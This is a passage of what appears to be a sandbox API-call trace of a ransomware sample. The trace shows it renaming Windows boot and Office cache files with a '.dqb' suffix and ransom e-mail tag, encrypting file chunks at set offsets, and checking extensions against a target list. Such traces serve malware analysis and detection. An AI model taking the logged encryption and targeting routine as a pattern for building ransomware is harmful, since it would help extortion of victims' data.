(lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.843] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0032.843] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=47452) returned 1 [0032.843] CloseHandle (hObject=0x160) returned 1 [0032.844] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0032.844] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.844] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.844] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=93248) returned 1 [0032.844] CloseHandle (hObject=0x160) returned 1 [0032.844] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0032.844] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.844] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.844] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=90688) returned 1 [0032.844] CloseHandle (hObject=0x160) returned 1 [0032.845] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0032.845] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.845] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.845] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=90704) returned 1 [0032.845] CloseHandle (hObject=0x160) returned 1 [0032.845] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0032.845] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.845] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.845] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=76352) returned 1 [0032.845] CloseHandle (hObject=0x160) returned 1 [0032.845] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0032.846] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0032.846] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.958] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0032.960] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0032.960] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0032.960] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0032.960] ReadFile (in: hFile=0x17c, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.169] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0033.169] ReadFile (in: hFile=0x17c, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.175] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0033.175] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0033.175] ReadFile (in: hFile=0x17c, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.193] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0033.193] WriteFile (in: hFile=0x17c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0033.399] SetEndOfFile (hFile=0x17c) returned 1 [0033.399] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f424c8 [0033.403] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0033.403] WriteFile (in: hFile=0x17c, lpBuffer=0x3f424c8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f424c8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.157] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0034.157] WriteFile (in: hFile=0x17c, lpBuffer=0x3f424c8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f424c8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.157] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0034.157] WriteFile (in: hFile=0x17c, lpBuffer=0x3f424c8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f424c8*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.159] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f424c8 | out: hHeap=0x570000) returned 1 [0034.161] CloseHandle (hObject=0x17c) returned 1 [0036.758] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0036.758] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.758] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.758] lstrlenW (lpString=".doc") returned 4 [0036.758] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0036.758] lstrlenW (lpString=".docx") returned 5 [0036.758] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0036.758] lstrlenW (lpString=".pdf") returned 4 [0036.758] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0036.758] lstrlenW (lpString=".xls") returned 4 [0036.758] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0036.758] lstrlenW (lpString=".xlsx") returned 5 [0036.758] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0036.758] lstrlenW (lpString=".ppt") returned 4 [0036.758] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0036.758] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.758] lstrlenW (lpString=".zip") returned 4 [0036.758] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0036.758] lstrlenW (lpString=".rar") returned 4 [0036.758] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0036.758] lstrlenW (lpString=".bz2") returned 4 [0036.758] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0036.758] lstrlenW (lpString=".7z") returned 3 [0036.758] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0036.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.759] lstrlenW (lpString=".dbf") returned 4 [0036.759] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0036.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.759] lstrlenW (lpString=".1cd") returned 4 [0036.759] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0036.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.759] lstrlenW (lpString=".jpg") returned 4 [0036.759] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0036.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.759] lstrlenW (lpString=".doc") returned 4 [0036.759] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0036.759] lstrlenW (lpString=".docx") returned 5 [0036.759] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0036.759] lstrlenW (lpString=".pdf") returned 4 [0036.759] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0036.759] lstrlenW (lpString=".xls") returned 4 [0036.759] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0036.759] lstrlenW (lpString=".xlsx") returned 5 [0036.759] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0036.759] lstrlenW (lpString=".ppt") returned 4 [0036.759] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0036.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.759] lstrlenW (lpString=".zip") returned 4 [0036.759] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0036.759] lstrlenW (lpString=".rar") returned 4 [0036.759] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0036.759] lstrlenW (lpString=".bz2") returned 4 [0036.759] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0036.759] lstrlenW (lpString=".7z") returned 3 [0036.759] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0036.759] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.759] lstrlenW (lpString=".dbf") returned 4 [0036.760] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0036.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.760] lstrlenW (lpString=".1cd") returned 4 [0036.760] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0036.760] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0036.760] lstrlenW (lpString=".jpg") returned 4 [0036.760] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0036.760] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0036.760] lstrlenW (lpString="OutlookMUI.msi") returned 14 [0036.760] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0036.760] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=2865664) returned 1 [0036.760] CloseHandle (hObject=0x17c) returned 1 [0036.760] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi")) returned 0x2020 [0036.760] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.760] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0036.761] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0036.802] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0036.802] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0036.802] ReadFile (in: hFile=0x17c, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.878] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0036.880] ReadFile (in: hFile=0x17c, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.893] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0036.893] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0036.893] ReadFile (in: hFile=0x17c, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.907] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.907] WriteFile (in: hFile=0x17c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0037.204] SetEndOfFile (hFile=0x17c) returned 1 [0037.204] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3fea4f0 [0037.388] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0037.388] WriteFile (in: hFile=0x17c, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.389] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0037.389] WriteFile (in: hFile=0x17c, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.394] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0037.394] WriteFile (in: hFile=0x17c, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.396] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fea4f0 | out: hHeap=0x570000) returned 1 [0037.396] CloseHandle (hObject=0x17c) returned 1 [0037.828] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0037.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.829] lstrlenW (lpString=".doc") returned 4 [0037.829] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0037.829] lstrlenW (lpString=".docx") returned 5 [0037.829] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0037.829] lstrlenW (lpString=".pdf") returned 4 [0037.829] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0037.829] lstrlenW (lpString=".xls") returned 4 [0037.829] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0037.829] lstrlenW (lpString=".xlsx") returned 5 [0037.829] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0037.829] lstrlenW (lpString=".ppt") returned 4 [0037.829] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0037.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.829] lstrlenW (lpString=".zip") returned 4 [0037.829] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0037.829] lstrlenW (lpString=".rar") returned 4 [0037.829] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0037.829] lstrlenW (lpString=".bz2") returned 4 [0037.829] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0037.829] lstrlenW (lpString=".7z") returned 3 [0037.829] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0037.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.829] lstrlenW (lpString=".dbf") returned 4 [0037.829] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0037.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.829] lstrlenW (lpString=".1cd") returned 4 [0037.829] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0037.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.829] lstrlenW (lpString=".jpg") returned 4 [0037.829] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0037.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.829] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.830] lstrlenW (lpString=".doc") returned 4 [0037.830] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0037.830] lstrlenW (lpString=".docx") returned 5 [0037.830] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0037.830] lstrlenW (lpString=".pdf") returned 4 [0037.830] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0037.830] lstrlenW (lpString=".xls") returned 4 [0037.830] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0037.830] lstrlenW (lpString=".xlsx") returned 5 [0037.830] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0037.830] lstrlenW (lpString=".ppt") returned 4 [0037.830] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0037.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.830] lstrlenW (lpString=".zip") returned 4 [0037.830] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0037.830] lstrlenW (lpString=".rar") returned 4 [0037.830] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0037.830] lstrlenW (lpString=".bz2") returned 4 [0037.830] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0037.830] lstrlenW (lpString=".7z") returned 3 [0037.830] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0037.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.830] lstrlenW (lpString=".dbf") returned 4 [0037.830] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0037.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.830] lstrlenW (lpString=".1cd") returned 4 [0037.830] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0037.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0037.830] lstrlenW (lpString=".jpg") returned 4 [0037.830] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0037.830] lstrcmpiW (lpString1=".msi", lpString2=".dqb") returned 1 [0037.830] lstrlenW (lpString="WordMUI.msi") returned 11 [0037.830] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0037.831] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=2522624) returned 1 [0037.831] CloseHandle (hObject=0x17c) returned 1 [0037.831] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi")) returned 0x2020 [0037.831] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all 